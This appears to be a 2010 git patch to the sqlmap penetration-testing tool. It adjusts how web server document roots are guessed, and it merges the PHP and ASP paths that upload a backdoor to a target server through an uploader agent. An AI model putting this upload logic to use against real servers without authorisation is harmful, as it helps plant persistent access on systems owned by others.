From 00a23ace9a4aaabdf02520d60969200429bf7bee Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 9 Feb 2010 14:27:41 +0000
Subject: [PATCH] some changes regarding web takeover

---
 lib/core/common.py  | 10 +++++++---
 lib/takeover/web.py | 19 ++-----------------
 2 files changed, 9 insertions(+), 20 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 625ca097d..cd330001a 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -232,6 +232,8 @@ def getDocRoot():
 
     if kb.absFilePaths:
         for absFilePath in kb.absFilePaths:
+            if directoryPath(absFilePath) == '/':
+                continue
             absFilePath = normalizePath(absFilePath)
             absFilePathWin = None
 
@@ -271,20 +273,22 @@ def getDirs():
     directories = set()
 
     if kb.os == "Windows":
-        defaultDir = "C:/Inetpub/wwwroot/test/"
+        defaultDir = "C:/Inetpub/wwwroot/"
     else:
-        defaultDir = "/var/www/test/"
+        defaultDir = "/var/www/"
 
     if kb.absFilePaths:
         infoMsg  = "retrieved web server full paths: "
         infoMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
         logger.info(infoMsg)
-
+        
         for absFilePath in kb.absFilePaths:
             if absFilePath:
                 directory = directoryPath(absFilePath)
                 if isWindowsPath(directory):
                     directory = directory.replace('\\', '/')
+                if directory == '/':
+                    continue
                 directories.add(directory)
     else:
         warnMsg = "unable to retrieve any web server path"
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 264a14ddf..0c1e18b7f 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -86,14 +86,14 @@ class Web:
         return retVal
 
     def __webFileStreamUpload(self, stream, destFileName, directory):
-        if self.webApi == "php":
+        if self.webApi in ("php", "asp"):
             multipartParams = {
                                 "upload":    "1",
                                 "file":      stream,
                                 "uploadDir": directory,
                               }
                               
-            page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
+            page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)
 
             if "File uploaded" not in page:
                 warnMsg  = "unable to upload the backdoor through "
@@ -103,21 +103,6 @@ class Web:
             else:
                 return True
 
-        elif self.webApi == "asp":
-            backdoorRemotePath = "%s/%s" % (directory, destFileName)
-            backdoorRemotePath = normalizePath(backdoorRemotePath)
-            backdoorContent = stream.read()
-            postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
-            page, _ = Request.getPage(url=self.webUploaderUrl, direct=True, post=postStr)
-
-            if "permission denied" in page.lower():
-                warnMsg  = "unable to upload the backdoor through "
-                warnMsg += "the uploader agent on '%s'" % directory
-                logger.warn(warnMsg)
-                return False
-            else:
-                return True
-
         elif self.webApi == "jsp":
             return False